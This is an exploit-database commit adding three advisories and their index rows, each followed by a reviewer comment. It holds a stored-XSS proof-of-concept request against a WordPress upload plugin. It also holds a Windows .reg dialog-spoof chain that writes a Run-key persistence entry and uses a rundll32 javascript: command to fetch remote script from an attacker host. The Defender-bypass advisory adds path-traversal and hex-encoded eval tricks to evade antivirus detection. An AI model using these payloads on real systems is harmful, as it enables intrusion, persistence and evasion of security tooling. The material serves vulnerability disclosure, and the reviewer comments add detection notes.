DB: 2022-01-13

3 changes to exploits/shellcodes

Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass
Microsoft Windows Defender - Detections Bypass

WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
Offensive Security 2022-01-13 05:01:58 +00:00
parent 6a94460ed6
commit 00e20a3a1c
4 changed files with 454 additions and 0 deletions

@ -0,0 +1,118 @@
# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
# Date: 10/01/2022
# Exploit Author: Veshraj Ghimire
# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
# Version: 1.3.2
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# CVE : CVE-2021-24563
# References:
https://www.youtube.com/watch?v=lfrLoHl4-Zs
https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1
# Description:
The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
# Proof Of Concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"
1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"
test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"
test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html
<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"
upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"
image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"
021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"
92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"
1247
-----------------------------124662954015823207281179831654--
Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html
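Review bot: the PoC request above cannot be replayed as written: the values of `Accept:` and `Content-Type:` have been wrapped onto the lines below their header names, there is no `Host:` header, and `Content-Length: 1396` does not match the body shown. The header block also gives no patched plugin version and the description names no mitigation; for triage it would help to state that the fix is for the plugin to reject `text/html` (and other browser-renderable) uploads regardless of the `Content-Type` the client sends, since the description already says the form "does not prevent HTML files from being uploaded". Minor wording: the last line reads `access the uploaded to trigger the XSS`; it should be `the uploaded file`.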

@ -0,0 +1,215 @@
# Exploit Title: Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.
[Vulnerability Type]
Windows .Reg File Dialog Spoof - Mitigation Bypass
[CVE Reference]
N/A
[Security Issue]
Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message.
This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or
whatever else an attacker would like to display.
This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the
registry security warning dialog box LIE to them as the warning messages are now under an attacker's control.
The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user.
Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe.
Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe
.NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft.
In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update"
Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711
However, the "fix" is easily bypassed and the old payload can still be made to work across systems.
Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC.
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
Lets begin...
My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read.
00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 |
00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename
00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE
00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes
00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
00007FFE7A4A7C92 | 85 C9 | test ecx,ecx
00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7
ntdll!woutput_l+0x387:
00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=????
========================================================================================================================================
Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day)
to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and with minor tweaks on Win-10.
Original works on Win-7, but crashes regedit.exe on Win-10:
Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg
Original payload (first mitigation bypass) works Win-7/Win-10:
Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg
New payload mitigation bypass works on both Win-7 and Win-10:
Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg
However, we are NOT done yet as we must deal with Windows Defender detection preventions.
1) Trojan:Win32/Powessere.G
2) Backdoor:JS/Relvelshe.A
Bypassing "Trojan:Win32/Powessere.G"
=====================================
Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender.
A) extra path traversal when referencing mshtml ..\\..\\..\\
B) concatenation when constructing the remote server URL scheme "script"+":"+"http.
FAIL on current updated Windows 10
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.
SUCCESSFUL on current updated Windows 10
Using an extra ..\ results in a bypass, but does nothing useful just an alert box.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(1)
Trying to download and execute remote code using the payload below fails again, as we need the second component URL scheme concat.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp")
Access is denied.
Jscript concatenation of the URL scheme.
document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
Successfully bypasses "Trojan:Win32/Powessere.G" detection!
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
Final hurdle we face, Windows defender detects the below downloaded file named "backdoor" as Backdoor:JS/Relvelshe.A and removes it from INetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\backdoor[1]"
File "backdoor" contents.
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
Bypassing "Backdoor:JS/Relvelshe.A" detection.
==============================================
The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe")
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
Done!, successfully bypassed the .Reg spoof mitigation and two Windows Defender detections. Long Live Windows .Reg file dialog spoofing Flaw!
[References]
Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
https://threatpost.com/windows-bug-spoof-dialog-boxes/142711/
[Mitigation Bypass, New PoC Video URL]
https://www.youtube.com/watch?v=QANX45jieoo
[Exploit/PoC/2022]
Note: The circa 2019 advisory exploit abused "Image File Execution Options" to store the payload as a debugger setting for MSIE.
Unfortunately, that no longer works, so we will make do for now with storing the payload on disk in a .cmd file and registry Run key.
1) Create a .Reg Dialog Spoofing file named, Sales_Report_2022.%n%nClick YES to cancel%0.reg with below contents
OR use the original payload with minor alterations. Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg
I prefer the original because the % characters help obscure the obvious wording in the filename.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"HATE"="C:\\dump\\s.cmd"
2) Create a Windows .cmd file, "s.cmd", with below contents. Unfortunately, it needs to be stored on disk using the path as referenced in the .Reg file above,
update server IP as required.
rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
3) Create the remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell.
<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>
4) Logout and log back into Windows, BOOM calc.exe runs!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Original Vendor Notification: March 1, 2019
Original MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability".
March 10, 2019 : Public Disclosure
Vendor Notification:
January 10, 2022 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
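Review bot: the disclosure timeline is incomplete: `Vendor Notification:` for the 2022 re-disclosure is left blank, so the entry should either carry a date or say that the bypass was not reported before the January 10, 2022 publication. Two smaller points in the same file: the ntdll listing repeats the `cmp word ptr ds:[r13],r11w` line at 00007FFE7A4A7C87 twice, the second time out of address order after the `test ecx,ecx` at 7C92, so one copy should go; and `[Network Access]` says `Local` while steps 2 and 3 of the PoC fetch `hi.tmp` from an HTTP server at 192.168.1.45, which should be reflected there. For anyone writing detections, the persistence the PoC relies on is already visible in the file and would be worth listing under a mitigation section, which the advisory lacks: an `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` value pointing at `C:\dump\s.cmd`, and a `rundll32.exe javascript:` command line that reaches `mshtml,RunHTMLApplication` through extra `..\` segments and calls `GetObject` on a `script:` URL.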

@ -0,0 +1,118 @@
# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together
machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in
your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your
device and in the cloud.
[Vulnerability Type]
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A
[CVE Reference]
N/A
[Security Issue]
Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.
Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").
However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.
Full bypass E.g.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
Enter, Backdoor:JS/Relvelshe.A detection.
Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"
However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
Advisory:
https://twitter.com/hyp3rlinx/status/1480651583172091904
[Exploit/PoC]
1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.
python -m http.server 80
"hi.tmp"
<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>
2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
BOOM!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
January 10, 2022 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
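Review bot: the `# Exploit Title:` line reads `Microsoft Internet Explorer / ActiveX Control - Security Bypass`, but the file's own `[Vulnerability Type]`, the commit message and the CSV row all call this `Microsoft Windows Defender - Detections Bypass`; the title should be corrected so the records agree. The detection name is also written `TrojanWin32Powessere.G` under `[Vulnerability Type]` and `[Security Issue]`, while `[References]` uses the correct `Trojan:Win32/Powessere.G`. As in the companion advisory, `[Network Access]` is `Local` even though step 1 hosts `hi.tmp` on a remote web server on port 80. No mitigation section is given; the observable pattern for defenders is the same `rundll32.exe javascript:` command line with extra `..\` segments before `mshtml`, plus the `hi.tmp[1]` artefact under `INetCache`, both of which would be worth recording alongside the two Defender signature names.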

@ -11430,6 +11430,8 @@ id,file,description,date,author,type,platform,port
50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows,
50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows,
50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
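Review bot: the description for 50654, `Microsoft Windows Defender - Detections Bypass`, does not match the `# Exploit Title:` inside `50654.txt` (`Microsoft Internet Explorer / ActiveX Control - Security Bypass`); one of the two should be changed so that a search on either title finds the entry. Both new rows use `1970-01-01` in the date column; the surrounding rows do the same, so if that placeholder is the convention for this file it is consistent, but both advisories carry a `January 10, 2022 : Public Disclosure` date that could be used instead.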
@ -44732,3 +44734,4 @@ id,file,description,date,author,type,platform,port
50648,exploits/php/webapps/50648.txt,"Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
50649,exploits/php/webapps/50649.txt,"Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Dominic Clark",webapps,php,
50655,exploits/php/webapps/50655.txt,"WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Veshraj Ghimire",webapps,php,
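Review bot: row 50655 agrees with the file header on author, title and platform, but the date column is `1970-01-01` while `50655.txt` states `# Date: 10/01/2022`; the neighbouring rows show the same placeholder, so if real dates are wanted in this file the advisory's date should be used. The `port` column is left empty; the PoC is an HTTP request, so `80` would be the natural value if the convention for webapps rows is to fill it.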
